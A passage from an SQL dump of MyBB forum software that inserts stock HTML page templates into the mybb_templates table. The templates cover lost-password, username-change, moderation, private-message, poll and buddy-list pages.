{$lang->lost_pw}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->lost_pw_form}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->email_address}</strong></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->request_user_pass}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_lostpw\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('354', 'usercp_changename', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_username}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->change_username}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->change_username}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->new_username}</strong></td>\n<td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"25\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_changename\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_username}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('355', 'moderation_split_post', '<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td>\n</tr>\n<tr>\n<td class=\"{$altbg}\" valign=\"top\" align=\"center\" width=\"1%\"><input type=\"checkbox\" class=\"checkbox\" name=\"splitpost[{$post[\'pid\']}]\" value=\"1\" /></td>\n<td class=\"{$altbg}\">{$message}</td>\n</tr>', '-2', '127', '', '1339729416'); INSERT INTO mybb_templates VALUES('356', 'newreply_threadreview_more', '<tr>\n<td class=\"thead\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->thread_review_more}</strong></span></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('357', 'misc_whoposted', '<html>\n<head>\n<title>{$lang->who_posted}</title>\n{$headerinclude}\n</head>\n<body style=\"margin:0px;top:0px;left:0px\" class=\"trow2\">\n<table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$lang->total_posts} {$numposts}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong><a href=\"misc.php?action=whoposted&amp;tid={$tid}&amp;sort=username\">{$lang->user}</a></strong></span></td>\n<td class=\"tcat\"><span class=\"smalltext\"><strong><a href=\"misc.php?action=whoposted&amp;tid={$tid}&amp;sort=numposts\">{$lang->num_posts}</a></strong></span></td>\n</tr>\n{$whoposted}\n<tr>\n<td colspan=\"2\" class=\"thead\" align=\"center\"><span class=\"smalltext\">[<a href=\"javascript:self.close();\">{$lang->close_window}</a>]</span></td>\n</tr>\n</table>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('358', 'misc_whoposted_poster', '<tr>\n<td class=\"{$altbg}\">{$profile_link}</a></td>\n<td class=\"{$altbg}\">{$poster[\'posts\']}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('359', 'moderation_deleteposts_post', '<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td>\n</tr>\n<tr>\n<td class=\"{$altbg}\" valign=\"top\" align=\"center\" style=\"width:5%\"><input type=\"checkbox\" class=\"checkbox\" name=\"deletepost[{$post[\'pid\']}]\" value=\"1\" /></td>\n<td class=\"{$altbg}\">{$message}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('360', 'moderation_deleteposts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_posts}</strong></td>\n</tr>\n{$posts}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_selected_posts}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_deleteposts\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('361', 'moderation_split', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->split_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->split_thread}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->new_thread_info}</strong></span></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->new_subject}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"newsubject\" value=\"{$lang->split_thread_subject} {$thread[\'subject\']}\" size=\"50\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->new_forum}</strong></td>\n<td class=\"trow1\">{$forumselect}</td>\n</tr>\n</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->posts_to_split}</strong></td>\n</tr>\n{$posts}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->split_thread}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_split\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('362', 'newreply_threadreview_post', '<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$reviewpostdate} {$reviewposttime}</strong></span></td>\n</tr>\n<tr>\n<td class=\"{$altbg}\">\n{$reviewmessage}\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('363', 'newreply_threadreview', '<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\"><strong>{$lang->thread_review}</strong></td>\n</tr>\n{$reviewbits}\n{$reviewmore}\n</table>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('364', 'sendthread', '<html>\n<head>\n<title>{$threadprefix[\'prefix\']} {$thread[\'subject\']} - {$lang->send_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$errors}\n<form action=\"sendthread.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->send_thread}</strong></td>\n</tr>\n<tr>\n<td width=\"40%\" class=\"trow1\"><strong>{$lang->recipient}</strong><br /><span class=\"smalltext\">{$lang->recipient_note}</span></td>\n<td width=\"60%\" class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"email\" value=\"{$email}\" /></td>\n</tr>\n{$guestfields}\n<tr>\n<td width=\"40%\" class=\"trow2\"><strong>{$lang->subject}</strong></td>\n<td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"subject\" value=\"{$subject}\" /></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"40%\" class=\"trow1\"><strong>{$lang->message}</strong></td>\n<td width=\"60%\" class=\"trow1\"><textarea cols=\"50\" rows=\"10\" name=\"message\">{$message}</textarea></td>\n</tr>\n</table>\n<br />\n<input type=\"hidden\" name=\"action\" value=\"do_sendtofriend\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->send_thread}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('365', 'usercp_editsig', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_sig}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$error}\n{$signature}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_sig}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"20%\"><span class=\"smalltext\">{$lang->edit_sig_note}</span>\n{$smilieinserter}</td>\n<td class=\"trow1\" width=\"80%\">\n<textarea rows=\"15\" cols=\"70\" id=\"signature\" name=\"signature\">{$sig}</textarea>\n{$codebuttons}\n</td>\n</tr>\n<tr>\n<td class=\"trow2\">\n<span class=\"smalltext\">{$lang->edit_sig_note2}</span>\n</td>\n<td class=\"trow2\">\n<span class=\"smalltext\">\n<label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"enable\" />&nbsp;{$lang->enable_sig_posts}</label><br />\n<label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"disable\" />&nbsp;{$lang->disable_sig_posts}</label><br />\n<label><input type=\"radio\" class=\"radio\" name=\"updateposts\" value=\"0\" checked=\"checked\" />&nbsp;{$lang->leave_sig_settings}</label></span>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_editsig\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_sig}\" />\n<input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('366', 'usercp_editsig_suspended', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->edit_sig}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<div class=\"error\">\n <p><em>{$lang->edit_sig_error_title}</em></p>\n <ul>\n <li>{$lang->edit_sig_no_permission}</li>\n </ul>\n</div>\n<br />\n{$signature}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('367', 'private_messagebit_denyreceipt', ' <span class=\"smalltext\"><a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}&amp;denyreceipt=1\">{$lang->deny_receipt}</a></span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('368', 'private_read_to', '<br />\n{$lang->to} {$to_recipients}\n{$bcc}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('369', 'private_read_bcc', '<br />{$lang->bcc} {$bcc_recipients}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('370', 'private_read_action', '<tr>\n <td class=\"tcat\" align=\"center\"><strong>{$actioned_on}</strong></td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('371', 'private_read', '<html>\n<head>\n<title>{$lang->viewing_pm} {$pm[\'subject\']}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\n<tr>\n<td class=\"thead\">\n<strong>{$pm[\'subject\']}</strong>\n</td>\n</tr>\n{$action_time}\n{$message}\n</table>\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('372', 'forumdisplay_inlinemoderation_col', '<td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" name=\"allbox\" onclick=\"inlineModeration.checkAll(this)\" /></td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('373', 'printthread_post', '<strong>{$postrow[\'subject\']}</strong> - {$postrow[\'profilelink\']} - <strong>{$postrow[\'date\']}</strong> <strong>{$postrow[\'time\']}</strong>\n<br />\n<br />\n{$postrow[\'message\']}\n<br />\n<br />\n<hr size=\"1\" />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('374', 'error_nopermission', '{$lang->error_nopermission_guest_1}\n<ol>\n<li>{$lang->error_nopermission_guest_2}</li>\n<li>{$lang->error_nopermission_guest_3}</li>\n<li>{$lang->error_nopermission_guest_4}</li>\n<li>{$lang->error_nopermission_guest_5}</li>\n</ol>\n<form action=\"member.php\" method=\"post\">\n<input type=\"hidden\" name=\"action\" value=\"do_login\" />\n<input type=\"hidden\" name=\"url\" value=\"{$redirect_url}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->login}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang_username}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" tabindex=\"1\" /></td>\n</tr>\n<tr>\n<td class=\"trow2\"><strong>{$lang->password}</strong></td>\n<td class=\"trow2\"><input type=\"password\" class=\"textbox\" name=\"password\" tabindex=\"2\" /></td>\n</tr>\n<tr>\n<td class=\"trow2\" colspan=\"2\"><span class=\"smalltext\" style=\"float:right; padding-top:3px;\"><a href=\"member.php?action=register\">{$lang->need_reg}</a> | <a href=\"member.php?action=lostpw\">{$lang->forgot_password}</a>&nbsp;</span>&nbsp;<input type=\"submit\" class=\"button\" value=\"{$lang->login}\" tabindex=\"3\" /></td>\n</tr>\n</table>\n</form>\n<br />', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('375', 'error_nopermission_loggedin', '{$lang->error_nopermission_user_1}\n<ol>\n <li>{$lang->error_nopermission_user_2}</li>\n <li>{$lang->error_nopermission_user_3}</li>\n <li>{$lang->error_nopermission_user_4} (<a href=\"member.php?action=resendactivation\">{$lang->error_nopermission_user_resendactivation}</a>)</li>\n <li>{$lang->error_nopermission_user_5}</li>\n</ol>\n<br />\n{$lang->error_nopermission_user_username}', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('376', 'private_folders', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->pm_folders}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->existing_folders}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$lang->edit_folder_note}</span></td>\n</tr>\n{$folderlist}\n<tr>\n<td class=\"thead\"><strong>{$lang->new_folders}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$lang->add_folders_note}</span></td>\n</tr>\n{$newfolders}\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_folders\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_folders}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('377', 'forumjump_bit', '<option value=\"{$forum[\'fid\']}\" {$optionselected}>{$depth} {$forum[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('378', 'forumjump_special', '<select name=\"{$name}\">\n<option value=\"index\" {$jumpsel[\'default\']}>{$lang->forumjump_select}</option>\n<option value=\"index\">--------------------</option>\n{$forumjumpbits}\n</select>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('379', 'moderation_move', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->move_copy_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->move_copy_thread}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow1\"><strong>{$lang->new_forum}</strong></td>\n<td class=\"trow2\">{$forumselect}</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->method}</strong></td>\n<td class=\"trow2\">\n<label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"move\" />{$lang->method_move}</label><br />\n<label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"redirect\" checked=\"checked\" />{$lang->method_move_redirect}</label> <input type=\"text\" class=\"textbox\" name=\"redirect_expire\" size=\"3\" /> {$lang->redirect_expire_note}<br />\n<label><input type=\"radio\" class=\"radio\" name=\"method\" value=\"copy\" />{$lang->method_copy}</label><br />\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->move_copy_thread}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_move\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('380', 'moderation_merge', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->merge_threads}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_threads}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->new_subject}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"subject\" value=\"{$thread[\'subject\']}\" size=\"40\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->thread_to_merge_with}</strong><br /><span class=\"smalltext\">{$lang->merge_with_note}</span></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"threadurl\" size=\"40\" />\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_threads}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_merge\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('381', 'showthread_similarthreads_bit', '<tr>\n <td align=\"center\" class=\"{$trow}\" width=\"2%\">{$icon}</td>\n <td class=\"{$trow}\">{$similar_thread[\'threadprefix\']}<a href=\"{$similar_thread[\'threadlink\']}\">{$similar_thread[\'subject\']}</a></td>\n <td align=\"center\" class=\"{$trow}\">{$similar_thread[\'profilelink\']}</td>\n <td align=\"center\" class=\"{$trow}\"><a href=\"javascript:MyBB.whoPosted({$similar_thread[\'tid\']});\">{$similar_thread[\'replies\']}</a></td>\n <td align=\"center\" class=\"{$trow}\">{$similar_thread[\'views\']}</td>\n <td class=\"{$trow}\" style=\"white-space: nowrap\">\n <span class=\"smalltext\">{$lastpostdate} {$lastposttime}<br />\n <a href=\"{$similar_thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span>\n </td>\n </tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('382', 'polls_newpoll_option', '<tr>\n<td>{$lang->option} {$i}:&nbsp;</td>\n<td><input type=\"text\" class=\"textbox\" name=\"options[{$i}]\" value=\"{$option}\" size=\"25\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('383', 'showthread_poll_option_multiple', '<tr>\n<td class=\"trow1\" width=\"1%\"><input type=\"checkbox\" class=\"checkbox\" name=\"option[{$number}]\" id=\"option_{$number}\" value=\"1\" /></td>\n<td class=\"trow2\" colspan=\"3\">{$option}</td>\n</tr>', '-2', '1601', '', '1339729416'); INSERT INTO mybb_templates VALUES('384', 'showthread_poll_option', '<tr>\n<td class=\"trow1\" width=\"1%\"><input type=\"radio\" class=\"radio\" name=\"option\" id=\"option_{$number}\" value=\"{$number}\" /></td>\n<td class=\"trow1\" colspan=\"3\">{$option}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('385', 'member_activate', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->account_activation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->activate_account}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"30%\"><strong>{$lang->username}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" value=\"{$user[\'username\']}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"30%\"><strong>{$lang->activation_code}</strong></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"code\" value=\"{$code}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"hidden\" name=\"action\" value=\"activate\" /><input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->activate_account}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('386', 'smilieinsert', '\n<div style=\"margin:auto; width: 170px; margin-top: 20px;\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" width=\"150\">\n<tr>\n<td class=\"thead\"><span class=\"smalltext\"><strong>{$lang->smilieinsert}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<table width=\"100%\" align=\"center\" border=\"0\" cellspacing=\"0\" cellpadding=\"2\" id=\"clickable_smilies\">\n{$smilies}\n</table>\n</td>\n</tr>\n{$getmore}\n</table>\n</div>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('387', 'misc_buddypopup_user_sendpm', '<a href=\"private.php?action=send&amp;uid={$buddy[\'uid\']}\" target=\"_blank\" onclick=\"window.opener.location.href=this.href; return false;\">{$lang->pm_buddy}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('388', 'usercp_editlists', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->edit_lists}</title>\n {$headerinclude}\n <script type=\"text/javascript\" src=\"jscripts/usercp.js\"></script>\n <script type=\"text/javascript\">\n lang.remove_buddy = \'{$lang->confirm_remove_buddy}\';\n lang.remove_ignored = \'{$lang->confirm_remove_ignored}\';\n lang.adding_buddy = \'{$lang->adding_buddy}\';\n lang.adding_ignored = \'{$lang->adding_ignored}\';\n </script>\n</head>\n<body>\n {$header}\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n {$usercpnav}\n <td valign=\"top\">\n\n <form action=\"usercp.php\" method=\"post\" id=\"buddy\" onsubmit=\"return UserCP.addBuddy(\'buddy\');\">\n <input type=\"hidden\" name=\"action\" value=\"do_editlists\" />\n <input type=\"hidden\" name=\"manage\" value=\"buddy\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" align=\"center\"><strong>{$lang->edit_buddy_list}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\">\n <fieldset>\n <legend><strong>{$lang->add_buddies}</strong></legend>\n <span class=\"smalltext\">{$lang->add_buddies_desc}</span><br />\n <div style=\"width: 120px; float: left; text-align: right;\"><strong>{$lang->username_or_usernames}</strong></div>\n <div style=\"margin-left: 130px;\"><input type=\"text\" name=\"add_username\" id=\"buddy_add_username\" style=\"width: 60%;\" class=\"textbox\" /> <input type=\"submit\" value=\"{$lang->add_to_buddies}\" id=\"buddy_submit\" class=\"button\" /></div>\n <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n <script type=\"text/javascript\">\n <!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"buddy_add_username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"});\n }\n // -->\n </script>\n </fieldset>\n <fieldset id=\"buddy_container\">\n <legend><strong>{$lang->current_buddies}</strong></legend>\n <ul id=\"buddy_list\" style=\"list-style: none;\">\n {$buddy_list}\n </ul>\n </fieldset>\n </td>\n </tr>\n </table>\n </form>\n <br />\n <form action=\"usercp.php\" method=\"post\" id=\"ignored\" onsubmit=\"return UserCP.addBuddy(\'ignored\');\">\n <input type=\"hidden\" name=\"action\" value=\"do_editlists\" />\n <input type=\"hidden\" name=\"manage\" value=\"ignored\" />\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" align=\"center\"><strong>{$lang->edit_ignore_list}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\">\n <fieldset>\n <legend><strong>{$lang->add_ignored_users}</strong></legend>\n <span class=\"smalltext\">{$lang->add_ignored_users_desc}</span><br />\n <div style=\"width: 120px; float: left; text-align: right;\"><strong>{$lang->username_or_usernames}</strong></div>\n <div style=\"margin-left: 130px;\"><input type=\"text\" name=\"add_username\" id=\"ignored_add_username\" style=\"width: 60%;\" class=\"textbox\" /> <input type=\"submit\" value=\"{$lang->ignore_users}\" id=\"ignored_submit\" class=\"button\" /></div>\n <script type=\"text/javascript\">\n <!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"ignored_add_username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"});\n }\n // -->\n </script>\n </fieldset>\n <fieldset id=\"ignored_container\">\n <legend><strong>{$lang->current_ignored_users}</strong></legend>\n <ul id=\"ignore_list\" style=\"list-style: none;\">\n {$ignore_list}\n </ul>\n </fieldset>\n </td>\n </tr>\n </table>\n </form>\n </td>\n </tr>\n </table>\n {$footer}\n</body>\n</html>', 